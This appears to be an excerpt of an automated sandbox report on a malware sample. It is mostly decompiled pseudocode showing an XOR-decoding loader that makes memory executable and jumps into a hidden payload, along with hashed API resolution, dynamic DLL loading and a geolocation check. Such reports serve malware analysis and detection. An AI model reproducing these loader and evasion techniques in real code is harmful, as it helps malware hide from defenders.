                                                  				_t109 = E00401730();
                                                  				_t122 = 0;
                                                  				while(1) {
                                                  					_t124 =  *(_t122 + _t109) ^ 0x11a7a880;
                                                  					_v128 = _t124;
                                                  					if(_t124 == 0x3e && _t124 == 0x97 && _v126 == 0xbd && _v125 == 0xba) {
                                                  						break;
                                                  					}
                                                  					_t122 = _t122 + 1;
                                                  					if(_t122 < 0x4000) {
                                                  						continue;
                                                  					} else {
                                                  						_t130 = _v80;
                                                  					}
                                                  					L9:
                                                  					_v132 = 0;
                                                  					_v136 = 0x2ca00;
                                                  					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
                                                  					_v76 = _v76 ^ 0x11a7a880;
                                                  					_v72 = _v72 ^ 0x11a7a880;
                                                  					_v68 = _v68 ^ 0x11a7a880;
                                                  					_v64 = _v64 ^ 0x11a7a880;
                                                  					_v60 = _v60 ^ 0x11a7a880;
                                                  					E004016B0(_t119, _t130, 0x2ca00,  &_v76);
                                                  					_t82 = _t130 + 0x21810; // 0x21810, executed
                                                  					 *_t82(); // executed
                                                  					return 0;
                                                  				}
                                                  				_t130 = _t122 + _t109;
                                                  				_v80 = _t130;
                                                  				goto L9;
                                                  			}

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID: C+hc
                                                  • API String ID: 2706961497-3848425603
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 82 41e081-41e0c4 call 41eb17 NtAllocateVirtualMemory
                                                  C-Code - Quality: 53%
                                                  			E0041E081(void* __ecx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, char _a32) {
                                                  				long _t14;
                                                  
                                                  				asm("outsb");
                                                  				asm("cld");
                                                  				asm("sbb edx, [ebp-0x75]");
                                                  				_t10 = _a8;
                                                  				E0041EB17( *((intOrPtr*)(_a8 + 0x14)), _t10, _t10 + 0xc84,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x30);
                                                  				_t4 =  &_a32; // 0x404448
                                                  				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28,  *_t4); // executed
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: HD@
                                                  • API String ID: 2167126740-1661062907
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 41e087-41e09d 86 41e0a3-41e0c4 NtAllocateVirtualMemory 85->86 87 41e09e call 41eb17 85->87 87->86
                                                  C-Code - Quality: 100%
                                                  			E0041E087(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, char _a28) {
                                                  				long _t14;
                                                  
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xc84,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                  				_t4 =  &_a28; // 0x404448
                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24,  *_t4); // executed
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: HD@
                                                  • API String ID: 2167126740-1661062907
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 329 40c317-40c333 330 40c33b-40c340 329->330 331 40c336 call 420837 329->331 332 40c342-40c345 330->332 333 40c346-40c354 call 420c57 330->333 331->330 336 40c364-40c375 call 41f0b7 333->336 337 40c356-40c361 call 420ed7 333->337 342 40c377-40c38b LdrLoadDll 336->342 343 40c38e-40c391 336->343 337->336 342->343
                                                  C-Code - Quality: 100%
                                                  			E0040C317(void* __eflags, void* _a4, intOrPtr _a8) {
                                                  				char* _v8;
                                                  				struct _EXCEPTION_RECORD _v12;
                                                  				struct _OBJDIR_INFORMATION _v16;
                                                  				char _v536;
                                                  				void* _t15;
                                                  				struct _OBJDIR_INFORMATION _t17;
                                                  				struct _OBJDIR_INFORMATION _t18;
                                                  				void* _t30;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  
                                                  				_v8 =  &_v536;
                                                  				_t15 = E00420837( &_v12, 0x104, _a8);
                                                  				_t31 = _t30 + 0xc;
                                                  				if(_t15 != 0) {
                                                  					_t17 = E00420C57(__eflags, _v8);
                                                  					_t32 = _t31 + 4;
                                                  					__eflags = _t17;
                                                  					if(_t17 != 0) {
                                                  						E00420ED7( &_v12, 0);
                                                  						_t32 = _t32 + 8;
                                                  					}
                                                  					_t18 = E0041F0B7(_v8);
                                                  					_v16 = _t18;
                                                  					__eflags = _t18;
                                                  					if(_t18 == 0) {
                                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                  						return _v16;
                                                  					}
                                                  					return _t18;
                                                  				} else {
                                                  					return _t15;
                                                  				}
                                                  			}

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C389
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 315 4014e9 316 4014f0-4014ff 315->316 317 401501-401504 316->317 318 401512-401519 316->318 317->318 319 401506-40150a 317->319 318->316 320 40151b 318->320 319->318 321 40150c-401510 319->321 322 40151e-401573 NtProtectVirtualMemory call 4016b0 320->322 321->318 323 401586-40158c 321->323 327 401579 call 422f47 322->327 328 401579 call 422f39 322->328 323->322 326 40157b-401585 327->326 328->326
                                                  C-Code - Quality: 58%
                                                  			E004014E9(void* __eax, void* __ebx, void* __ecx) {
                                                  				void* _t25;
                                                  				void* _t35;
                                                  				void* _t37;
                                                  				signed int _t39;
                                                  				void* _t41;
                                                  				void* _t43;
                                                  
                                                  				_t37 = __ecx;
                                                  				_t35 = __ebx;
                                                  				_t25 = __eax;
                                                  				while(1) {
                                                  					_t39 =  *(_t37 + _t25) ^ 0x11a7a880;
                                                  					 *(_t43 - 0x74) = _t39;
                                                  					if(_t39 == 0x3e && _t39 == 0x97 &&  *((char*)(_t43 - 0x72)) == 0xbd &&  *((char*)(_t43 - 0x71)) == 0xba) {
                                                  						break;
                                                  					}
                                                  					_t37 = _t37 + 1;
                                                  					if(_t37 < 0x4000) {
                                                  						continue;
                                                  					} else {
                                                  						_t41 =  *(_t43 - 0x44);
                                                  					}
                                                  					L7:
                                                  					 *(_t43 - 0x78) = 0;
                                                  					 *(_t43 - 0x7c) = 0x2ca00;
                                                  					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
                                                  					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x11a7a880;
                                                  					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x11a7a880;
                                                  					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x11a7a880;
                                                  					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x11a7a880;
                                                  					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x11a7a880;
                                                  					E004016B0(_t35, _t41, 0x2ca00, _t43 - 0x40);
                                                  					_t22 = _t41 + 0x21810; // 0x21810, executed
                                                  					 *_t22(); // executed
                                                  					return 0;
                                                  				}
                                                  				_t41 = _t37 + _t25;
                                                  				 *(_t43 - 0x44) = _t41;
                                                  				goto L7;
                                                  			}

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 344 41dea7-41def8 call 41eb17 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041DEA7(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				long _t21;
                                                  
                                                  				_t3 = _a4 + 0xc64; // 0xc64
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  				return _t21;
                                                  			}

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000005,00000000,004187E3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187E3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEF4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 41df52-41dfa0 call 41eb17 NtReadFile
                                                  C-Code - Quality: 19%
                                                  			E0041DF52(void* __eax, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                  				void* _t21;
                                                  				intOrPtr* _t32;
                                                  				void* _t34;
                                                  
                                                  				asm("sbb eax, 0x55b2e1f3");
                                                  				_t16 = _a4;
                                                  				_t4 = _t16 + 0xc6c; // 0xe72
                                                  				_t32 = _t4;
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t16, _t32,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                  				_t21 =  *((intOrPtr*)( *_t32))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __eax, _t34); // executed
                                                  				return _t21;
                                                  			}







                                                  APIs
                                                  • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 357 41df57-41df6d 358 41df73-41dfa0 NtReadFile 357->358 359 41df6e call 41eb17 357->359 359->358
                                                  C-Code - Quality: 37%
                                                  			E0041DF57(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                  				void* _t18;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t3 = _a4 + 0xc6c; // 0xe72
                                                  				_t27 = _t3;
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                  				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                  				return _t18;
                                                  			}






                                                  APIs
                                                  • NtReadFile.NTDLL(004189A7,00413C7B,FFFFFFFF,00418491,00000206,?,004189A7,00000206,00418491,FFFFFFFF,00413C7B,004189A7,00000206,00000000), ref: 0041DF9C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041DFD2(intOrPtr __ebx, void* __edx, void* __edi, intOrPtr _a4, void* _a8) {
                                                  				long _t11;
                                                  
                                                  				 *((intOrPtr*)(__edx + __edi - 0xffffffffec8b5554)) = __ebx;
                                                  				_t8 = _a4;
                                                  				_t6 = _t8 + 0xc74; // 0xc79
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t8, _t6,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                  				_t11 = NtClose(_a8); // executed
                                                  				return _t11;
                                                  			}





                                                  APIs
                                                  • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041DFD7(intOrPtr _a4, void* _a8) {
                                                  				long _t8;
                                                  
                                                  				_t3 = _a4 + 0xc74; // 0xc79
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t5, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                  				_t8 = NtClose(_a8); // executed
                                                  				return _t8;
                                                  			}





                                                  APIs
                                                  • NtClose.NTDLL(00418985,00000206,?,00418985,00000005,FFFFFFFF), ref: 0041DFFC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_a90000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 408d87-408dd1 call 41faf7 call 4205e7 call 40c317 call 418a87 303 408dd3-408de5 PostThreadMessageW 294->303 304 408e05-408e09 294->304 305 408e04 303->305 306 408de7-408e01 call 40ba77 303->306 305->304 306->305
                                                  C-Code - Quality: 82%
                                                  			E00408D87(void* __eflags, intOrPtr _a4, long _a8) {
                                                  				char _v67;
                                                  				char _v68;
                                                  				void* _t12;
                                                  				intOrPtr* _t13;
                                                  				int _t14;
                                                  				long _t21;
                                                  				intOrPtr* _t25;
                                                  				void* _t26;
                                                  				void* _t30;
                                                  
                                                  				_t30 = __eflags;
                                                  				_v68 = 0;
                                                  				E0041FAF7( &_v67, 0, 0x3f);
                                                  				E004205E7( &_v68, 3);
                                                  				_t12 = E0040C317(_t30, _a4 + 0x20,  &_v68); // executed
                                                  				_t13 = E00418A87(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                                  				_t25 = _t13;
                                                  				if(_t25 != 0) {
                                                  					_t21 = _a8;
                                                  					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                  					_t32 = _t14;
                                                  					if(_t14 == 0) {
                                                  						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040BA77(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                  					}
                                                  					return _t14;
                                                  				}
                                                  				return _t13;
                                                  			}













                                                  APIs
                                                  • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DE1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                                  • Instruction ID: 3980c94b8ac149ca01037ed3d68c8fe9f93dea2d4a324d6a02d52aa73a4abf13
                                                  • Opcode Fuzzy Hash: 6a5c76f33e69d631c5cd5faa055fa231827f6670659c0f58f240d0f59781fcbe
                                                  • Instruction Fuzzy Hash: 1C018831A8022876E720A6959C43FFE765C5B41B59F04412EFF04FA1C1E6A8690686E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 41e1ed-41e1f6 310 41e1f8-41e21f call 41eb17 ExitProcess 309->310 311 41e24d-41e27f 309->311
                                                  C-Code - Quality: 100%
                                                  			E0041E1ED(void* __ebx, void* __ecx, void* __edx, void* __esi, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
                                                  				void* _v0;
                                                  				void* _v1;
                                                  				void* _t25;
                                                  
                                                  				_t25 = __ebx + 1;
                                                  				if (_t25 != 0) goto L3;
                                                  			}






                                                  0x0041e1f3
                                                  0x0041e1f6

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,000000E6,?,?,00000001), ref: 0041E21F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                                  • Instruction ID: 3a23005c1a450b0ce9384711c7274ff542fa1110ee067af937f3c804ecebbb44
                                                  • Opcode Fuzzy Hash: fe07c7a1fe7cc184691f729d252de3d8f94143cdc67c282ef1b5fd2a164ce06d
                                                  • Instruction Fuzzy Hash: 470144B6200108ABCB14DF99DC84DEB77ACEF8C654F058259FA5D9B245C630E801CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 347 41e388-41e38f 348 41e391-41e3c1 call 41ebe7 347->348 349 41e339-41e34b LookupPrivilegeValueW 347->349
                                                  C-Code - Quality: 34%
                                                  			E0041E388(void* __eax, struct _LUID* __edx, void* __edi, intOrPtr _a5, intOrPtr _a9, WCHAR* _a12, WCHAR* _a16) {
                                                  				intOrPtr* __esi;
                                                  				int _t10;
                                                  
                                                  				asm("sbb [0x6c5f1de9], ecx");
                                                  				if(__edi - 1 >= 0) {
                                                  					_t10 = LookupPrivilegeValueW(_a12, _a16, __edx); // executed
                                                  					return _t10;
                                                  				} else {
                                                  					__edx = __edx - 1;
                                                  					__esp = __esp + 1;
                                                  					asm("pushad");
                                                  					asm("fisub word [ecx]");
                                                  					_t3 = __eax;
                                                  					__eax = __ebp;
                                                  					__ebp = _t3;
                                                  					__ebp = __esp;
                                                  					__eax = _a5;
                                                  					__esi = _a5 + 0x1bf4;
                                                  					__eax = E0041EBE7(__eax, __esi,  *((intOrPtr*)(__eax + 0x23a4)), 2);
                                                  					__edx = _a9;
                                                  					__eax =  *__esi;
                                                  					__eax =  *((intOrPtr*)( *__esi))(_a9, __ebp);
                                                  					_pop(__esi);
                                                  					__ebp = __esi;
                                                  					return  *__esi;
                                                  				}
                                                  			}






                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                                  • Instruction ID: 4716ddf173ef1f5294d4de290b384ef1d893ae9b9691d9ddf83f7a3629dea316
                                                  • Opcode Fuzzy Hash: 9ed70f12ad27d53b096bd0f9a4e238804728527f94b575bc47a36bf1a0f4018d
                                                  • Instruction Fuzzy Hash: 6FF05EB5600214AFCB04DFA9DC45CE7776CEF85368B01846AFD598B642E632E911CBE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041E177(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                  				void* _t10;
                                                  
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                  				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}




                                                  0x0041e18e
                                                  0x0041e1a4
                                                  0x0041e1a8

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(0041813D,?,004188E4,004188E4,?,0041813D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1A4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                  • Instruction ID: 39b5cabef950e6491fd1ff11e6bcb4f47bb735b4b1560f452d24bb2e9d3c42ad
                                                  • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                  • Instruction Fuzzy Hash: 83E046B5200218ABDB18EF9ADC45EE737ACEF88764F018159FE095B242C630F910CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041E1B7(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                  				char _t10;
                                                  
                                                  				_t3 = _a4 + 0xc98; // 0xc98
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}




                                                  0x0041e1c6
                                                  0x0041e1ce
                                                  0x0041e1e4
                                                  0x0041e1e8

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1E4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                  • Instruction ID: 1d552643a1b6a9e7e8cbaa6fd288b4534f8ea2684dbb839d41cd3eb30db23803
                                                  • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                  • Instruction Fuzzy Hash: 83E04FB52002146BD714DF49DC49ED737ACEF88754F014155FD0957241D630F914CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041E317(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                  				int _t10;
                                                  				struct _LUID* _t13;
                                                  
                                                  				E0041EB17( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                                  				_t13 = _a16;
                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _t13); // executed
                                                  				return _t10;
                                                  			}





                                                  0x0041e331
                                                  0x0041e336
                                                  0x0041e347
                                                  0x0041e34b

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F389,0040F389,?,00000000,?,?), ref: 0041E347
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                  • Instruction ID: fb85849f582dcab3273909ea3b6beb81fed045dfd13ab71d80f81a5ef931559d
                                                  • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                  • Instruction Fuzzy Hash: 04E01AB52002186BD710DF49DC45EE737ADAF89664F118159BE0957241D631F8108AB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E0040F537(intOrPtr _a4) {
                                                  				intOrPtr* _t7;
                                                  				void* _t8;
                                                  
                                                  				_t7 = E00418A87(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0xbc4)), 0, 0, 0x998e91b2);
                                                  				if(_t7 != 0) {
                                                  					_t8 =  *_t7(0x10); // executed
                                                  					return 0 | _t8 == 0x000000f1;
                                                  				} else {
                                                  					return _t7;
                                                  				}
                                                  			}






                                                  APIs
                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 0040F561
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
